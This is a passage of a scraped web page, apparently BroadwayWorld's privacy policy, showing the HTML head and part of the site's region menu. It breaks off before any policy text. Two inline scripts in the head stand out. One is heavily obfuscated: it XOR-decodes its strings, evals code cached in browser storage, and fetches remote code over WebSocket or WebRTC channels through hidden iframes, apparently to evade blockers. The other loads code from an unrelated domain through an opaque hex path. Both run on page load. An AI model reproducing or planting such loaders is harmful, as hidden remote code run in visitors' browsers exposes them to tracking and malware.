
<!DOCTYPE HTML>
<!-- BEGIN html -->
<html lang=en>
<head>
<title>BroadwayWorld Privacy Policy</title>
<link rel=canonical href="https://www.broadwayworld.com/privacy.cfm">
<meta name=description content="BroadwayWorld Privacy Policy">
<meta name=apple-itunes-app content="app-id=530770227"/>
<!-- Meta Tags -->
<meta http-equiv=Content-Type content="text/html; charset=UTF-8"/>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1, maximum-scale=1"/>
<!-- Favicon -->
<link rel=apple-touch-icon-precomposed sizes=57x57 href="https://newimages.bwwstatic.com/2017/apple-touch-icon-57x57.png"/>
<link rel=apple-touch-icon-precomposed sizes=114x114 href="https://newimages.bwwstatic.com/2017/apple-touch-icon-114x114.png"/>
<link rel=apple-touch-icon-precomposed sizes=72x72 href="https://newimages.bwwstatic.com/2017/xapple-touch-icon-72x72.png.pagespeed.ic.8tKwTK3gnG.png"/>
<link rel=apple-touch-icon-precomposed sizes=144x144 href="https://newimages.bwwstatic.com/2017/apple-touch-icon-144x144.png"/>
<link rel=apple-touch-icon-precomposed sizes=60x60 href="https://newimages.bwwstatic.com/2017/apple-touch-icon-60x60.png"/>
<link rel=apple-touch-icon-precomposed sizes=120x120 href="https://newimages.bwwstatic.com/2017/apple-touch-icon-120x120.png"/>
<link rel=apple-touch-icon-precomposed sizes=76x76 href="https://newimages.bwwstatic.com/2017/apple-touch-icon-76x76.png"/>
<link rel=apple-touch-icon-precomposed sizes=152x152 href="https://newimages.bwwstatic.com/2017/apple-touch-icon-152x152.png"/>
<link rel=icon type="image/png" href="https://newimages.bwwstatic.com/2017/favicon-196x196.png" sizes=196x196 />
<link rel=icon type="image/png" href="https://newimages.bwwstatic.com/2017/favicon-96x96.png" sizes=96x96 />
<link rel=icon type="image/png" href="https://newimages.bwwstatic.com/2017/favicon-32x32.png" sizes=32x32 />
<link rel=icon type="image/png" href="https://newimages.bwwstatic.com/2017/favicon-16x16.png" sizes=16x16 />
<link rel=icon type="image/png" href="https://newimages.bwwstatic.com/2017/favicon-128.png" sizes=128x128 />
<meta name=application-name content="&nbsp;"/>
<meta name=msapplication-TileColor content="#FFFFFF"/>
<meta name=msapplication-TileImage content="https://newimages.bwwstatic.com/2017/mstile-144x144.png"/>
<meta name=msapplication-square70x70logo content="https://newimages.bwwstatic.com/2017/mstile-70x70.png"/>
<meta name=msapplication-square150x150logo content="https://newimages.bwwstatic.com/2017/mstile-150x150.png"/>
<meta name=msapplication-wide310x150logo content="https://newimages.bwwstatic.com/2017/mstile-310x150.png"/>
<meta name=msapplication-square310x310logo content="https://newimages.bwwstatic.com/2017/mstile-310x310.png"/>
<!-- Stylesheets -->
<link type="text/css" rel=stylesheet href="https://nav.bwwstatic.com/2017/reset.min.css"/>
<link type="text/css" rel=stylesheet href="https://nav.bwwstatic.com/2017/font-awesome-4.7.0/css/font-awesome.min.css"/>
<link type="text/css" rel=stylesheet href="https://nav.bwwstatic.com/2017/bootstrap-3.3.7-dist/css/bootstrap2.min.css"/>
<link type="text/css" rel=stylesheet href="https://nav.bwwstatic.com/2017/main-nonminified13bshortcodes.css"/>
<link type="text/css" rel=stylesheet href="https://nav.bwwstatic.com/2017/responsive2a.min.css"/>
<link type="text/css" rel=stylesheet href="https://nav.bwwstatic.com/2017/dat-menu.min.css"/>
<link type="text/css" rel=stylesheet href='https://fonts.googleapis.com/css?family=Montserrat:400,700'/>
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
			<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
			<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
		<![endif]-->
<!--[if lte IE 8]>
		<link type="text/css" rel="stylesheet" href="https://nav.bwwstatic.com/2017//ie-ancient.css" />
		<![endif]-->
<script>window.googletag=window.googletag||{};googletag.cmd=googletag.cmd||[];window.m2hb=window.m2hb||{};m2hb.que=m2hb.que||[];m2hb.ssl='https:'==document.location.protocol;window.M2_TIMEOUT=1000;m2hb.maxRetries=20;m2hb.retries=0;m2hb.loadJS=function(src,async){m2hb.loadedJS=m2hb.loadedJS||[];m2hb.loadedJS.push(src);(function(){var script=document.createElement("script");script.async=async||true;script.type="text/javascript";script.src=(m2hb.ssl?'https:':'http:')+src;var target=document.getElementsByTagName("head")[0];target.insertBefore(script,target.firstChild);})();};if(typeof m2hb.initAdserver=='undefined'){m2hb.initAdserver=function(){if(m2hb.initAdserverSet)return;if(typeof m2hb.timeRemaining=='undefined'){m2hb.timeRemaining=M2_TIMEOUT;}if(m2hb.timeRemaining>0){m2hb.timeRemaining-=100;if(!m2hb.m2hbBidsReady){setTimeout(function(){m2hb.initAdserver();},100);return;}}if(!googletag.pubadsReady&&(m2hb.retries<=m2hb.maxRetries)){m2hb.retries++;setTimeout(function(){m2hb.initAdserver();},50);return;}m2hb.initAdserverSet=true;googletag.cmd.push(function(){m2hb.que.push(function(){m2hb.setTargetingForGPTAsync();});googletag.pubads().refresh();});};}window.initAdserver=function(){return m2hb.initAdserver();}
m2hb.loadJS('//m2d.m2.ai/m2d.broadwayworld.desktop.min.js');googletag.cmd.push(function(){googletag.pubads().disableInitialLoad();m2hb.disabledGptInitialLoad=true;});m2hb.loadJS('//www.googletagservices.com/tag/js/gpt.js');m2hb.initAdserver();var width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth;googletag.cmd.push(function(){googletag.defineSlot('/106293300/NEWTCLEFT',[130,135],'div-gpt-ad-1479672818651-10').addService(googletag.pubads());googletag.defineSlot('/106293300/IndustrySponsor',[200,60],'div-gpt-ad-1479672818651-IndustrySponsor').addService(googletag.pubads());googletag.defineSlot('/106293300/NEW300A',[[300,250],[300,600]],'div-gpt-ad-1479672818651-0').addService(googletag.pubads());googletag.defineSlot('/106293300/NEW300B',[[300,250],[300,600]],'div-gpt-ad-1479672818651-1').addService(googletag.pubads());googletag.defineSlot('/106293300/NEW300C',[[300,250],[300,600]],'div-gpt-ad-1479672818651-2').addService(googletag.pubads());if(width<=1050){googletag.defineSlot('/106293300/NEW468',[468,60],'div-gpt-ad-1479672818651-5').addService(googletag.pubads());}if(width>=1201){googletag.defineSlot('/106293300/NEW160',[160,600],'div-gpt-ad-1479672818651-160').addService(googletag.pubads());googletag.defineSlot('/106293300/NEW970',[970,90],'div-gpt-ad-1479672818651-7').addService(googletag.pubads());}else{googletag.defineSlot('/106293300/NEW728',[728,90],'div-gpt-ad-1479672818651-6').addService(googletag.pubads());}googletag.defineSlot('/106293300/NEW300D',[300,250],'div-gpt-ad-1479672818651-3').addService(googletag.pubads());googletag.defineSlot('/106293300/Inter',[1,1],'div-gpt-ad-1479672818651-8').addService(googletag.pubads());googletag.defineSlot('/106293300/New728468Bottom',[728,90],'div-gpt-ad-1479672818651-New728468Bottom').addService(googletag.pubads());googletag.defineSlot('/106293300/TCROS-MUSICALS',[140,90],'div-gpt-ad-1479672818651-17').addService(googletag.pubads());googletag.defineSlot('/106293300/TCROS-PLAYS',[140,90],'div-gpt-ad-1479672818651-18').addService(googletag.pubads());googletag.defineSlot('/106293300/TCPULLDOWN-MUSICALS',[100,30],'div-gpt-ad-1479672818651-15').addService(googletag.pubads());googletag.defineSlot('/106293300/TCPULLDOWN-PLAYS',[100,30],'div-gpt-ad-1479672818651-16').addService(googletag.pubads());googletag.defineSlot('/106293300/Onscroll_VET_unit',[1,1],'div-gpt-ad-1479672818651-Onscroll').addService(googletag.pubads());googletag.pubads().setTargeting('Region','Broadway');googletag.pubads().collapseEmptyDivs();googletag.enableServices();});</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');ga('create','UA-253633-20','auto');ga('send','pageview');setTimeout("ga('send','event','adjusted bounce rate','page visit 15 seconds or more')",15000);</script> <!-- END head -->
<!-- END head -->
<script>try{(function(){function B(){try{var a=K()}catch(c){}if(a)try{C(a.h,null)}catch(c){delete window.localStorage[a.key],delete window.sessionStorage[a.key]}else L(function(a,b){b.as=!0;try{C(a,b)}catch(e){}},M)}function M(){var b=window.location.protocol==a("EgAMChJI")?a("EgAMChJISF0="):a("EgAMCltdSA==");(new Image).src=b+u+N}function L(a,c){function b(){var d=e.shift();if(d)try{d(a,b)}catch(m){b()}else v(),c()}try{O()}catch(f){v();c();return}var e=[P,Q,R,S];b()}function C(a,c){(function(){eval(a)})({e:a,p:c,n:g})}function K(){var b=[];window.localStorage&&b.push(window.localStorage);window.sessionStorage&&b.push(window.sessionStorage);var c=D(a("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="),E(a("CgYdGwwQCxc=")));c=new Uint8Array(c);for(var d="",e=0;e<c.length;e++)d+=String.fromCharCode(c[e]);c=btoa(d);d=(new Date).getTime();for(e=0;e<b.length;e++){var f=b[e],m;for(m in f)if(0===m.lastIndexOf(c,0)){try{for(var k=a("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="),g=atob(f[m]),l=new Uint8Array(g.length),h=0;h<g.length;h++)l[h]=g.charCodeAt(h);var n=r(D(k,l.buffer))}catch(U){continue}h=parseInt(n.substring(0,13),10);if(!isNaN(h))if(864E5<d-h||1>d-h)f.removeItem(m);else if((h=n.substring(13))&&!(16>h.length))return{h:h,key:m}}}return null}function Q(b,c){var d=a("SUBPQg=="),e=a("TTZCSVdIUjZbVFZcKjVcXDtCJl5eVFlXMVtVJS9TQ1VAMDtAIzBdM1RcXF5RNlJeOE5dU1VXW11NWlheKllKXU1OTExbMVRIJ1NVVS5OJFVAPVJdUVhXL0VSW1FWLDY=");d=w+":"+d;var f={};f[a("DwYUCQ==")]=a("DgEKFFs=")+d+a("RQAKGw8BFx0TElISCAQ=");f[a("GQYdHgQcExsACg==")]=a("AxUMEwwT");f[a("DwcdCA8TChc=")]=a("AxUMEwwT");F(e,f,function(b){b=b.match(new RegExp(a("JBcZFAUbAxMVA1U6D19GOB5TR09bVxgJBxQ6IDxAUDkeX1hSPRZMLk86C003WjoAUSRJOwBGRE0rDEREGBAARQgRFBsY")));if(null==b)return null;b=b[1];return a("GRUWHggWBgYEXF5GWlQzICpYX1RXXF9bREg=")+b+a("WkJLSlBERwYYFk8UDhgHHVoKBgMAH00=")+b+a("WgYIFRMGR0RSVl5QSxoDEA0XFQxJDgIeA0hf")},b,c)}function R(b,c){var d=a("TERISw=="),e=a("PEFCOyNIX0tbI1tcX0VcXUtCUF5eXl5XR1pVJlRTRyRAQTpAJENdNFRcW1BRQyNePD1dUiJXX1lNUCleLixKUT9OSzlbNyRIVl5VVl1OU1dAOVVdVytXWTZSWF1WUEg=");d=w+":"+d;var f={};f[a("DwYUCQ==")]=[a("CQANFFs=")+d];F(e,f,function(b){b=b.match(new RegExp(a("JBcZFAUbAxMVA1U6D19GOB5TR09bVxgJBxQ6IDxAUDkeX1hSPRZMLk86C003WjoAUSRJOwBGTTETQ0ZEGBAARQkGHhYZ")));if(null==b)return null;b=b[1];return a("GRUWHggWBgYEXF9GWlQzICpYVVZQWllVRF5bU0w=")+b+a("WgABCkEaCAEV")},b,c)}function F(b,c,d,e,f){function m(a){k||(k=!0,a.apply(null,Array.prototype.slice.call(arguments,1)))}var k=!1;e=m.bind(null,e);f=m.bind(null,f);var p={};p[a("ExcdKQQAERcTFQ==")]=[c];var l=new g.c(p);l[a("GQYdGxUXIxMVBywOChoIARY=")](a("VRkdDgBdFxsPAQ==")).binaryType=a("GwYKGxgQEhQHAx0=");l[a("FRoRGQQRBhwFDwsHHxE=")]=function(b){if(null!=b[a("GRUWHggWBgYE")]&&(b=d(b[a("GRUWHggWBgYE")][a("GRUWHggWBgYE")]),null!=b)){var c={};c[a("GRUWHggWBgYE")]=b;c[a("CRAINy0bCRcoCAsDEw==")]=0;l[a("GxAcMwIXJBMPAgYCCgAD")](new g.b(c),function(){},function(){})}};l.addEventListener(a("ExcdGQ4cCRcCEgYJBQcSBQ4dBA8FAwoI"),function(){l[a("ExcdOQ4cCRcCEgYJBScSBQ4d")]===a("HBURFgQW")&&f()});var h=a("DElIcA5PEgEEFAEHBhFGVFpIRy4qTSQ9Q0heVltHQEtKWklwEk8UFxIVBgkFGgcJH3IEWi0jTSQnXE9VXl5eVVREVktrBlpCQVZlB1YSDwodHRUXFgQDGU0bBwVBW0VTWg==")+b+a("cBVFEwIXSh0REgYJBQdcEAgRBAwICGcASgkfFAAAEwQOHRcUQUNVQVVGKzInJ0k3OSw3R1FdXV19CVIXDx0ACBsEQk9RQldSFgMNFB8XSwAbDAYEDAwDAxIET1ZZX3oERx0bH0wHAQAAAVU=")+function(){for(var b="",c=a("SkRISlFCV0I="),d=0;16>d;++d){var e=(4294967296*Math.random()>>>0).toString(16);b+=c.substring(0,c.length-e.length)+e}return b}()+a("cBVFEwIXSgIWAlVWW0RWVEpIV1dUXV1dR1hfVFxZQFVKREhKUUJXQlFWX2w=");l[a("GQYdGxUXKBQHAx0=")](function(b){l[a("CREMNg4RBh4lAxwFGR0WEBMXCQ==")](b,function(){var b={};b[a("Dg0IHw==")]=a("GxoLDQQA");b[a("CRAI")]=h;l[a("CREMKAQfCAYEIgoVCAYPFA4RCAk=")](new g.f(b),function(){},function(){})},function(){})},function(){});b=l[a("GQYdGxUXIxMVBywOChoIARY=")](a("VQMLCmE=")+window.navigator.userAgent);b.binaryType=a("GwYKGxgQEhQHAx0=");G(b,x(),function(b){e(b,{rtc:l})},function(){f()})}function S(b,c){function d(b){m||(m=!0,b.apply(null,Array.prototype.slice.call(arguments,1)))}var e=x();e=(window.location.protocol==a("EgAMChJI")?a("EgAMChJISF0="):a("EgAMCltdSA=="))+u+e;var f=a("PTEs"),m=!1;b=d.bind(null,b);c=d.bind(null,c);var k=new g.g;k.onreadystatechange=function(){4==k.readyState&&(0==k.status?c():b(r(k.response),{}))};k.onerror=function(){c()};k.open(f,e,!0);k.responseType=a("GwYKGxgQEhQHAx0=");k.send(null)}function P(b,c){var d=a("DQcLQE5d"),e=new g.a(d+w+a("VQMLCg=="));e.binaryType=a("GwYKGxgQEhQHAx0=");G(e,x(),function(a){b(a,{ws:e})},function(){c()})}function G(b,c,d,e){function f(b){g||(g=!0,b.apply(null,Array.prototype.slice.call(arguments,1)))}var g=!1;d=f.bind(null,d);e=f.bind(null,e);var k=!1,p=setTimeout(function(){e(Error())},3E3),l=E(JSON.stringify({url:c||"",method:a("PTEs"),headers:null,body:null}));b.onopen=function(){clearTimeout(p);b.send(l)};var h=new ArrayBuffer(0),n;b.onmessage=function(b){if(4===b.data.byteLength){var a=new Uint8Array(b.data);if(222===a[0]&&173===a[1]&&190===a[2]&&239===a[3])return}!1===k?(k=!0,b=r(b.data),n=JSON.parse(b),n={status:n.status||0,headers:{}}):(b=b.data,a=new Uint8Array(h.byteLength+b.byteLength),a.set(new Uint8Array(h),0),a.set(new Uint8Array(b),h.byteLength),h=a.buffer)};b.onerror=function(){clearTimeout(p);e(Error())};b.onclose=function(){k?(n.body=h,d(r(n.body))):(clearTimeout(p),e(Error()))}}function y(b){return window[b.name]?window[b.name]:b[a("GRsWDgQcEzYOBRoLDhoS")]&&b[a("GRsWDgQcEzYOBRoLDhoS")][a("HhEeGxQeEyQIAxg=")]?b[a("GRsWDgQcEzYOBRoLDhoS")][a("HhEeGxQeEyQIAxg=")]:b[a("GRsWDgQcEyUICAsJHA==")]}function H(){var b=document.createElement(a("ExIKGwwX"));b.style.height=a("SwQA");b.style.width=a("SwQA");b.style.display=a("FBsWHw==");b[a("CQYbHg4R")]=a("Gw==");b.name||(b.name=String.fromCharCode(parseInt(25*Math.random()+97,10))+Math.random().toString(36).substring(7));(document.body||document.head||document.documentElement).appendChild(b);var c=y(b);c.document.documentElement||c.document.write(a("Gw=="));try{c.stop()}catch(d){}return b}function O(){I=a("DxoTFA4FCQ==");t=a("GRwKFQwX");q=a("HB0KHwcdHw==");z=a("FQQdCAA=");A=a("CRUeGxMb");var b=H();b=y(b);var c=b.navigator.userAgent;var d=(new RegExp(a("GRwKFQwXGxEJFAALAgEL"),"i")).test(c)?t:(new RegExp(a("HB0KHwcdHw4IBQoRDhUVARYEAR8NAh4="),"i")).test(c)?q:(new RegExp(a("JFxQRUARDwAOCwoaChoCFhURA05KREceFg4OFgU="),"i")).test(c)?A:(new RegExp(a("FQQKBg4CDh0S"),"i")).test(c)?z:window[a("GRwKFQwX")]?t:"undefined"!==typeof InstallTrigger?q:I;-1===[t,q,z,A].indexOf(d)&&(b=window);c=a("HwIZFg==");g.c=b[c](a("DR0WHg4FSSA1JT8DDgYlCxQWAgQQBAIDVxQTRBsAHgEVA1YNBBAMGxU0OyU7EQMWORcJCQEOGQQYBk8YEEkHDBQQFw1PHwgIMzIsNg4RFCcVFgkCBxkEAhlIExhMHhkLHhsPVAwBNSYiNgoDGTcJChQdBBMNAgM="));g.f=b[c](a("DR0WHg4FSSA1JTwDGAcPCxQ8AhQHHwQdAwEACkwVDEUNHRYeDgVJBQQEBA8fJjInKR0UFA0CAykSGwwWBRkEDBUaWAYdUhAbDwIAEUUZCR4oLCQ0AR4eBBgGKwEfCgIMCgARFQ9SGw5BEQYIDxsRShcLNTMnPggeBAEACigMAwYIHQgOCB0J"));g.b=b[c](a("DR0WHg4FSSA1JSYFDjcHCh4RAwYQCE0RC0gYDQINHxJUAx0YChsTIDUlJgUONwcKHhEDBhAITRELSBgNAg0fElQZFwAzJiQ7AgMsBwUQDwAbDAJHGBFNGh4GCwsbRx0WKCA7MwIXJBMPAgYCCgAD"));d===q?(d=H(),g.a=y(d)[c](a("DR0WHg4FSSUEBDwJCB8DEA==")),d.parentElement.removeChild(d)):g.a=b[c](a("DR0WHg4FSSUEBDwJCB8DEA=="));g.g=b[c](a("DR0WHg4FSSosKicSHwQ0AQsNAhQQ"))}function D(b,a){var c=new Uint8Array(a),e=new ArrayBuffer(a.byteLength);e=new Uint8Array(e);for(var f=0;f<a.byteLength;f++)e[f]=c[f]^b.charCodeAt(f%b.length);return e.buffer}function r(b){if(window.TextDecoder)return(new window.TextDecoder("utf-8")).decode(new Uint8Array(b));var a="";b=new Uint8Array(b);for(var d=b.byteLength,e=0;e<d;e++)a+=String.fromCharCode(b[e]);return decodeURIComponent(escape(a))}function E(b){if(window.TextEncoder)return(new window.TextEncoder("utf-8")).encode(b).buffer;b=unescape(encodeURIComponent(b));for(var a=new Uint8Array(b.length),d=0;d<b.length;d++)a[d]=b.charCodeAt(d);return a.buffer}function x(){return a("VRESCV4CWg==")+"2166160003"}function a(a){a=window.atob(a);for(var b="",d=0;d<a.length;d++)b+=String.fromCharCode(a.charCodeAt(d)^"ztxzargrafofktfdzxggdmmmwhodlipe".charCodeAt(d%32));return b}function v(){if(!J){var a=document.createElement("script");a.src=("https:"==window.location.protocol?"https://":"http://")+u+T;document.getElementsByTagName("head")[0].appendChild(a);J=!0}}var u=a("AhwKVBUbDB0FBwMHRRcJCQ=="),w=a("G1oMEwodAxMNB0EFBBk="),T=decodeURIComponent("%2Fljs%3Fp%3D")+"2166160003",N=a("VRhHClw=")+"2166160003"+a("XBdFHwc=")+a("XBcaRw==")+Math.random().toString().slice(3,9),g={},I,t,q,z,A,J=!1;if(/ucbrowser/i.test(navigator.userAgent)||window.i)try{v()}catch(b){}try{B()}catch(b){}})()}catch(B){};</script>
<script>(function(a,b,c,d,e){e=a.createElement(b);a=a.getElementsByTagName(b)[0];e.async=1;e.src=c;a.parentNode.insertBefore(e,a)})(document,'script','//straightschool.com/c1c4b4f4bb72169ce25531cf03fdc83fe6d962fc74afffa7a6650c829a94c55ae1c35e5453fc206e20e3be2f8e43f35ab724c2d4c49f004fdaf9f21db2a1');</script>
</head>
<!-- BEGIN body -->
<body class="ot-menu-will-follow  has-dat-menu  ">
<div id=dat-menu class=effect-2><div class=dat-menu-container><div class=dat-menu-wrapper>
<!-- BEGIN .boxed -->
<div class=boxed>
<!-- BEGIN #header -->
<div id=header style="margin-bottom: -1px;">
<!-- BEGIN #top-menu -->
<nav id=top-menu>
<!-- BEGIN .wrapper -->
<div class=wrapper>
<div class="top-panel-weather right">
<span class=w-stats style="background-color: #f8f8f8;border-width: 1px;border-style: solid;border-color: black;"><a href="/newlogin.cfm">Log In</a></span>&nbsp;&nbsp;
<a href="/register.cfm"><span class=w-stats style="background-color:#b20223;" style="color:#fff;">Register Now</span></a>
</div>
<ul class="load-responsive hd-nav" rel="Jump To">
<li><a href="/"><i class="fa fa-home"></i></a></li>
<li><a href="/aroundtheworld/"><i class="fa fa-globe"></i></a></li>
<li><a href="/westend/">West End</a></li>
<li><a href="/off-broadway/">Off-Broadway</a></li>
<li class=dat-has-sub><a href="/aroundtheworld/">United States</a>
<div class=h-sub-menu>
<ul>
<li><a href="/national-tours/">NATIONAL TOURS</a></li>
<li class=dat-has-sub><a href="#">A-D</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/birmingham/">ALABAMA - Birmingham</a></li><li><a href="/anchorage/">ALASKA - Anchorage</a></li><li><a href="/phoenix/">ARIZONA - Phoenix Metro</a></li><li><a href="/tucson/">ARIZONA - Tucson</a></li><li><a href="/little-rock/">ARKANSAS - Little Rock</a></li><li><a href="/costa-mesa/">CALIFORNIA - Costa Mesa</a></li><li><a href="/los-angeles/">CALIFORNIA - Los Angeles</a></li><li><a href="/palm-springs/">CALIFORNIA - Palm Springs</a></li><li><a href="/sacramento/">CALIFORNIA - Sacramento</a></li><li><a href="/san-diego/">CALIFORNIA - San Diego</a></li><li><a href="/san-francisco/">CALIFORNIA - San Francisco</a></li><li><a href="/santa-barbara/">CALIFORNIA - Santa Barbara</a></li><li><a href="/thousand-oaks/">CALIFORNIA - Thousand Oaks</a></li><li><a href="/denver/">COLORADO - Denver</a></li><li><a href="/connecticut/">CONNECTICUT</a></li><li><a href="/delaware/">DELAWARE</a></li> </ul>
</div>
</li>
<li class=dat-has-sub><a href="#">E-F</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/miami/">FLORIDA - Miami</a></li><li><a href="/fort-lauderdale/">FLORIDA - Ft. Lauderdale</a></li><li><a href="/ft-myers-naples/">FLORIDA - Ft. Myers/Naples</a></li><li><a href="/jacksonville/">FLORIDA - Jacksonville</a></li><li><a href="/orlando/">FLORIDA - Orlando</a></li><li><a href="/palm-beach/">FLORIDA - Palm Beach</a></li><li><a href="/st-petersburg/">FLORIDA - St. Petersburg</a></li><li><a href="/tallahassee/">FLORIDA - Tallahassee</a></li><li><a href="/tampa/">FLORIDA - Tampa</a></li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="#">G-K</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/atlanta/">GEORGIA - Atlanta</a></li><li><a href="/hawaii/">HAWAII</a></li><li><a href="/boise/">IDAHO - Boise</a></li><li><a href="/chicago/">ILLINOIS - Chicago</a></li><li><a href="/indianapolis/">INDIANA - Indianpolis</a></li><li><a href="/south-bend/">INDIANA - South Bend</a></li><li><a href="/des-moines/">IOWA - Des Moines</a></li><li><a href="/wichita/">KANSAS - Wichita</a></li><li><a href="/louisville/">KENTUCKY - Louisville</a></li> </ul>
</div>
</li>
<li class=dat-has-sub><a href="#">L-M</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/new-orleans/">LOUISIANA - New Orleans</a></li><li><a href="/maine/">MAINE</a></li><li><a href="/baltimore/">MARYLAND - Baltimore</a></li><li><a href="/boston/">MASSACHUSETTS - Boston</a></li><li><a href="/detroit/">MICHIGAN - Detroit</a></li><li><a href="/minneapolis/">MINNESOTA - Minneapolis</a></li><li><a href="/st-paul/">MINNESOTA - St. Paul</a></li><li><a href="/jackson/">MISSISSIPPI - Jackson</a></li><li><a href="/kansas-city/">MISSOURI - Kansas City</a></li><li><a href="/st-louis/">MISSOURI - St. Louis</a></li><li><a href="/montana/">MONTANA</a></li> </ul>
</div>
</li>
<li class=dat-has-sub><a href="#">N</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/omaha/">NEBRASKA - Omaha</a></li><li><a href="/new-hampshire/">NEW HAMPSHIRE</a></li><li><a href="/new-jersey/">NEW JERSEY</a></li><li><a href="/las-vegas/">NEVADA - Las Vegas</a></li><li><a href="/albuquerque/">NEW MEXICO - Albuquerque</a></li><li><a href="/brooklyn/">NEW YORK - Brooklyn</a></li><li><a href="/buffalo/">NEW YORK - Buffalo</a></li><li><a href="/central-new-york/">NEW YORK - Central NY</a></li><li><a href="/long-island/">NEW YORK - Long Island</a></li><li><a href="/rockland/">NEW YORK - Rockland</a></li><li><a href="/rockland/">NEW YORK - Westchester</a></li><li><a href="/charlotte/">NORTH CAROLINA - Charlotte</a></li><li><a href="/raleigh/">NORTH CAROLINA - Raleigh</a></li><li><a href="/fargo/">NORTH DAKOTA - Fargo</a></li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="#">O</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/cincinnati/">OHIO - Cincinnati</a></li><li><a href="/cleveland/">OHIO - Cleveland</a></li><li><a href="/columbus/">OHIO - Columbus</a></li><li><a href="/dayton/">OHIO - Dayton</a></li><li><a href="/oklahoma/">OKLAHOMA - Oklahoma City</a></li><li><a href="/tulsa/">OKLAHOMA - Tulsa</a></li><li><a href="/portland/">OREGON - Portland</a></li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="#">P-T</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/central-pa/">PENNSYLVANIA - Central PA</a></li><li><a href="/philadelphia/">PENNSYLVANIA - Philadelphia</a></li><li><a href="/pittsburgh/">PENNSYLVANIA - Pittsburgh</a></li><li><a href="/rhode-island/">RHODE ISLAND</a></li><li><a href="/south-carolina/">SOUTH CAROLINA</a></li><li><a href="/sioux-falls/">SOUTH DAKOTA - Sioux Falls</a></li><li><a href="/memphis/">TENNESSEE - Memphis</a></li><li><a href="/nashville/">TENNESSEE - Nashville</a></li><li><a href="/austin/">TEXAS - Austin</a></li><li><a href="/dallas/">TEXAS - Dallas</a></li><li><a href="/houston/">TEXAS - Houston</a></li><li><a href="/san-antonio/">TEXAS - San Antonio</a></li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="#">U-W</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/salt-lake-city/">UTAH - Salt Lake City</a></li><li><a href="/vermont/">VERMONT</a></li><li><a href="/norfolk/">VIRGINIA - Richmond/Norfolk</a></li><li><a href="/seattle/">WASHINGTON - Seattle</a></li><li><a href="/washington-dc/">WASHINGTON, DC</a></li><li><a href="/west-virginia/">WEST VIRGINIA</a></li><li><a href="/appleton/">WISCONSIN - Appleton</a></li><li><a href="/madison/">WISCONSIN - Madison</a></li><li><a href="/milwaukee/">WISCONSIN - Milwaukee</a></li><li><a href="/casper/">WYOMING - Casper</a></li> </ul>
</div>
</li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="/aroundtheworld/">International</a>
<div class=h-sub-menu>
<ul>
<li class=dat-has-sub><a href="#">NORTH AMERICA</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/montreal/">CANADA - MONTREAL</a></li><li><a href="/ottawa/regionalshows.cfm?ModPagespeed=off">CANADA - OTTAWA</a></li><li><a href="/toronto/">CANADA - TORONTO</a></li><li><a href="/vancouver/">CANADA - VANCOUVER</a></li><li><a href="/mexico/">MEXICO</a> </li>
<li><a href="/cuba/regionalshows.cfm?ModPagespeed=off">CUBA</a></li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="#">AUSTRALIA/NEW ZEALAND</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/adelaide/">AUSTRALIA - ADELAIDE</a></li><li><a href="/brisbane/">AUSTRALIA - BRISBANE</a></li>
<li><a href="/australia-melbourne/">AUSTRALIA - MELBOURNE</a></li><li><a href="/perth/">AUSTRALIA - PERTH</a></li><li><a href="/sydney/">AUSTRALIA - SYDNEY</a></li><li><a href="/new-zealand/">NEW ZEALAND</a></li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="#">UK/EUROPE</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/westend/">LONDON - WEST END</a></li><li><a href="/austria/">AUSTRIA</a></li><li><a href="/belgium/regionalshows.cfm?ModPagespeed=off">BELGIUM</a></li><li><a href="/finland/regionalshows.cfm?ModPagespeed=off">FINLAND</a></li><li><a href="/france/regionalshows.cfm?ModPagespeed=off">FRANCE</a></li><li><a href="/germany/">GERMANY</a></li><li><a href="/hungary/regionalshows.cfm?ModPagespeed=off">HUNGARY</a></li><li><a href="/ireland/">IRELAND</a></li><li><a href="/italy/">ITALY</a></li><li><a href="/luxembourg/regionalshows.cfm?ModPagespeed=off">LUXEMBOURG</a></li><li><a href="/monaco/">MONACO</a></li><li><a href="/netherlands/regionalshows.cfm?ModPagespeed=off">NETHERLANDS</a></li><li><a href="/norway/regionalshows.cfm?ModPagespeed=off">NORWAY</a></li><li><a href="/poland/regionalshows.cfm?ModPagespeed=off">POLAND</a></li><li><a href="/prague/regionalshows.cfm?ModPagespeed=off">PRAGUE</a></li><li><a href="/scotland/">SCOTLAND</a></li><li><a href="/spain/">SPAIN</a></li><li><a href="/sweden/">SWEDEN</a></li><li><a href="/switzerland/">SWITZERLAND</a></li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="#">SOUTH AMERICA</a>
